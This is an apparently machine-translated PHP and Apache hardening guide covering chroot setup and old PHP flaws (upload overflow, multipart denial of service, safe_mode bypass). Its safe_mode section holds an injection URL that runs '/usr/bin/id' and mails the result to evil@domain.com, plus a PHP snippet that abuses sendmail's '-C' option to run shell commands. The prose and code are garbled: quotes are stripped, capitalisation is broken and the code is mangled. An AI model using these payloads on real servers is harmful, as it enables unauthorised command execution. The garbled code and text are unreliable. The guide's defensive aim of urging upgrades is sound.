I. Web Server Security
PHP is actually a module function of the Web server. Therefore, you must first ensure the security of the Web server. Of course, to ensure the security of Web servers, you must first ensure the system security. This is a long way to go and is endless. PHP can be combined with various Web servers. Here we only discuss Apache. We strongly recommend that you install and start Apache in the form of chroot. In this way, even if Apache, PHP, and their scripts are prone to vulnerabilities, only the banned system will be affected and the actual system will not be harmed. However, the use of chroot Apache may cause some problems for the application. For example, when connecting to mysql, you must use the 127.0.0.1 address to use tcp connection instead of localhost to implement socket connection, this is slightly less efficient. The mail function is also a problem because of the following in php. ini:
[Mail function]
; For Win32 only.
SMTP = localhost
; For Win32 only.
Sendmail_from = me@localhost.com
All are for the Win32 platform, so you need to adjust sendmail in the chroot environment.
Ii. PHP Problems
1. Remote Overflow
All versions below PHP-4.1.2 have the remote buffer overflow vulnerability of file upload, and the attack program has been widely spread, the success rate is very high.
2. Remote Denial of Service
PHP-4.2.0 and PHP-4.2.1 have remote vulnerability in PHP multipart/form-data POST request processing, which can cause denial of service even though local user permissions are not available.
3. safe_mode Bypass Vulnerability
There is also a PHP mail function bypass safe_mode restriction command execution vulnerability in the PHP-4.2.2 versions below to the PHP-4.0.5 version, 4.0.5 versions start mail function added the fifth parameter, because the designer considers that he can break through the safe_mode restriction to execute commands within weeks. 4.0.5 breakthrough is very simple. You only need to use semicolons to separate and add shell commands. For example, the PHP script edevil. php exists:
Run the following URL:
Http://foo.com/evil.php? Bar =;/usr/bin/id mail evil@domain.com
This sends the result of id execution to the evil@domain.com.
For PHP from 4.0.6 to 4.2.2, breaking the safe_mode restriction actually uses the-C parameter of sendmail, so the system must use sendmail. The following code breaks through the safe_mode restriction and executes the command:
# Note: The following two must not exist, or their owner is the same as the owner of the script:
$ Script =/tmp/script123;
$ Cf =/tmp/cf123;
$ Fd = fopen ($ cf, w );
Fwrite ($ fd, OQ/tmp
Sparse = 0
R$ *. chr (9). $ # local $ @ $1 $: $1
Mlocal, P =/bin/sh, A = sh $ script );
Fclose ($ fd );
$ Fd = fopen ($ script, w );
Fwrite ($ fd, rm-f $ script $ cf ;);
Fwrite ($ fd, $ cmd );
Fclose ($ fd );
Mail (nobody,-C $ cf );
?>
If you are still using the above problematic PHP version, you must upgrade it to the latest version in time to eliminate basic security issues.